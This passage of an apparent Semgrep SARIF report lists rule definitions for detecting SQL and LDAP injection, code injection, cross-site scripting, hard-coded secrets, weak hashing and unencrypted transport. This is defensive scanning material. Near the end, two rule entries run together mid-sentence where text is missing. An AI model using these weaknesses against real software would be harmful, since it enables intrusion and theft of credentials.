rotation."},"help":{"markdown":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"help":{"markdown":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl](https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","id":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","name":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"help":{"markdown":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password)\n - [https://tools.ietf.org/html/rfc6151](https://tools.ietf.org/html/rfc6151)\n - [https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision](https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n - [https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords](https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords)\n - [https://github.com/returntocorp/semgrep-rules/issues/1609](https://github.com/returntocorp/semgrep-rules/issues/1609)\n - [https://docs.python.org/3/library/hashlib.html#hashlib.scrypt](https://docs.python.org/3/library/hashlib.html#hashlib.scrypt)\n","text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password","id":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","name":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.md5-used-as-password.md5-used-as-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"help":{"markdown":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string","id":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","name":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"help":{"markdown":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py)\n","text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","id":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","name":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution)\n - [https://owasp.org/www-community/attacks/Code_Injection](https://owasp.org/www-community/attacks/Code_Injection)\n - [https://stackoverflow.com/questions/3115559/exploitable-php-functions](https://stackoverflow.com/questions/3115559/exploitable-php-functions)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution","id":"php.lang.security.tainted-code-execution.tainted-code-execution","name":"php.lang.security.tainted-code-execution.tainted-code-execution","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-code-execution.tainted-code-execution"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request)\n - [https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-](https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-)\n - [https://www.baeldung.com/rest-template](https://www.baeldung.com/rest-template)\n","text":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","id":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","name":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"help":{"markdown":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli)\n - [https://sequelize.org/master/manual/raw-queries.html](https://sequelize.org/master/manual/raw-queries.html)\n","text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","id":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","name":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring)\n - [https://cwe.mitre.org/data/definitions/134.html](https://cwe.mitre.org/data/definitions/134.html)\n","text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","id":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","name":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","properties":{"precision":"very-high","tags":["CWE-134: Use of Externally-Controlled Format String","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash","id":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","name":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.passlib.passlib-insecure-hash.passlib-insecure-hash"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","id":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","name":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"help":{"markdown":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket","id":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","name":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.unencrypted-socket.unencrypted-socket"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"help":{"markdown":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption)\n - [https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22](https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22)\n - [https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/](https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/](https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/)\n","text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","id":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","name":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.pg-express.pg-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.pg-express.pg-express","id":"javascript.express.db.pg-express.pg-express","name":"javascript.express.db.pg-express.pg-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.pg-express.pg-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","id":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","name":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request)\n - [https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html](https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html)\n - [https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet](https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet)\n","text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","id":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","name":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","id":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","name":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Consuming CDNs without including a SubResource Integrity (SRI) can expose your application and its users to compromised code. SRIs allow you to consume specific versions of content where if even a single byte is compromised, the resource will not be loaded. Add an integrity attribute to your ` is not properly encoded."},"help":{"markdown":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded."},"helpUri":"https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json","id":"csharp.razor.security.html-raw-json.html-raw-json","name":"csharp.razor.security.html-raw-json.html-raw-json","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.razor.security.html-raw-json.html-raw-json"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be 